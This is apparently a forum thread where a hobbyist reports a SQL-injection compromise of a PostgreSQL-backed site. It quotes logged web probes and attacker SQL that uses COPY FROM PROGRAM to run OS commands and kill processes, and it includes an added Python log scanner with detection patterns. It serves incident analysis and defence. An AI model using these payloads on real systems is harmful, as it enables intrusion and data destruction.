I had this attack about a month ago. I'll show some more info.
I had my personal website (just for training) on a VPS (RedHat/Amazon Web Services).
I had PostgreSQL there, accessed from the website via POST/GET methods through a Python/psycopg2 script, plus Apache, and that's all. When the backend got a POST/GET request it logged in as the db user and performed an INSERT/SELECT. My database, which contained ~8 numbers (and was called "numbers"), was deleted and they replaced it with:
xd
In the logs I can see that the attacking bot was looking for a lot of standard weak points, here aiming e.g. at phpMyAdmin and WordPress (this is just a few of them; I didn't have any PHP on the site, so these are blind tries):
Code:
"GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 823 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209
"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 823 "-" "Mozilla/5.0 (...) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - -
"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 207 "-" "Mozilla/5.0 (...) Chrome/78.0.3904.108 Safari/537.36"
...
"GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
"GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
"GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
"GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
"GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
...
"GET /wordpress/ HTTP/1.1" 404 208 "-"
...
Finally the bot found the GET/POST methods and performed SQL injection, in my case:
Code:
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'cat /proc/cpuinfo' encoding 'gbk'; - hmmm?
SELECT * FROM cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'ps auxw|grep -v grep|grep -v nginx|sort -rn -k3|awk {if($3>50.0) print $2}|xargs kill -9' encoding 'gbk';
- Looks for running processes taking more than 50% of CPU and kills them.
SELECT * FROM cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'killall postgresq1' encoding 'gbk';
SELECT * FROM cmd_exec;
STATEMENT: SELECT pg_terminate_backend(pg_stat_activity.procpid) FROM pg_stat_activity WHERE pg_stat_activity.datname = 'please_read_me_xmg' AND procpid <> pg_backend_pid();
- Here the bot created a db with a "WARNING"
It also tried to log in as root:
DETAIL: Role "root" does not exist.
To prevent such an attack one needs to use database users and privileges properly, always pass arguments through the database driver, hide (and hash?) all source code and double-check the request in the script. Probably a lot more, but I'm a noob. Still, it should be enough against a blind bot.
The whole attack lasted 5 days according to the logs. If I had been watching them, I could have reacted.
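Since the post says the attack sat in the logs for five days, here is an added example (not part of the original post) of a small log scanner that flags exactly the indicators shown above: PostgreSQL statements that reach the OS or kill sessions, and web probes for PHP software that was never installed. The sample log lines are constructed from the excerpts in the post.

```python
import re

# Rules derived from the PostgreSQL log excerpts in the post.
PG_RULES = [
    (r"COPY\s+\w+\s+FROM\s+PROGRAM", "COPY FROM PROGRAM: SQL executing OS commands"),
    (r"pg_terminate_backend", "sessions terminated from SQL (attacker cleanup)"),
    (r'Role "root" does not exist', "login attempt as non-existent role root"),
]

# Rules derived from the Apache access-log excerpts in the post.
WEB_RULES = [
    (r"/scripts/setup\.php", "phpMyAdmin setup probe"),
    (r"XDEBUG_SESSION_START", "Xdebug probe"),
    (r"invokefunction|HelloThink", "ThinkPHP/ThinkCMF probe"),
    (r"/wordpress/", "WordPress probe"),
]

# Constructed sample input, shortened from the lines quoted in the post.
PG_SAMPLE = [
    "STATEMENT: CREATE TABLE cmd_exec(cmd_output text);",
    "STATEMENT: COPY cmd_exec FROM PROGRAM 'cat /proc/cpuinfo' encoding 'gbk';",
    "STATEMENT: SELECT * FROM cmd_exec;",
    "STATEMENT: SELECT pg_terminate_backend(procpid) FROM pg_stat_activity;",
    'DETAIL: Role "root" does not exist.',
]
WEB_SAMPLE = [
    '"GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 823',
    '"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 823',
    '"GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226',
    '"GET /wordpress/ HTTP/1.1" 404 208',
    '"GET / HTTP/1.1" 200 823',  # benign request, must not be flagged
]


def scan_lines(lines, rules):
    """Return (line_number, reason) for every line that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for pattern, reason in rules:
            if re.search(pattern, line, re.IGNORECASE):
                hits.append((n, reason))
                break  # one finding per line is enough to raise an alert
    return hits


def count_by_reason(hits):
    """Aggregate findings so a daily report shows what kind of activity was seen."""
    counts = {}
    for _, reason in hits:
        counts[reason] = counts.get(reason, 0) + 1
    return counts


if __name__ == "__main__":
    for name, lines, rules in (("postgres", PG_SAMPLE, PG_RULES), ("apache", WEB_SAMPLE, WEB_RULES)):
        for n, reason in scan_lines(lines, rules):
            print(f"{name} line {n}: {reason}")
```

Pointing `scan_lines` at the real postgresql and access logs (one line per list entry) and mailing any non-empty result is enough to notice the COPY FROM PROGRAM statements on day one instead of day five.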
a) wipe the whole system and start over.
After that attack I have changed my server provider and OS to FreeBSD.
Never expose SQL to the Internet.
How should I connect to the database from the website then (e.g. to add/remove items), in short? Maybe you know some good texts about it?
Cheers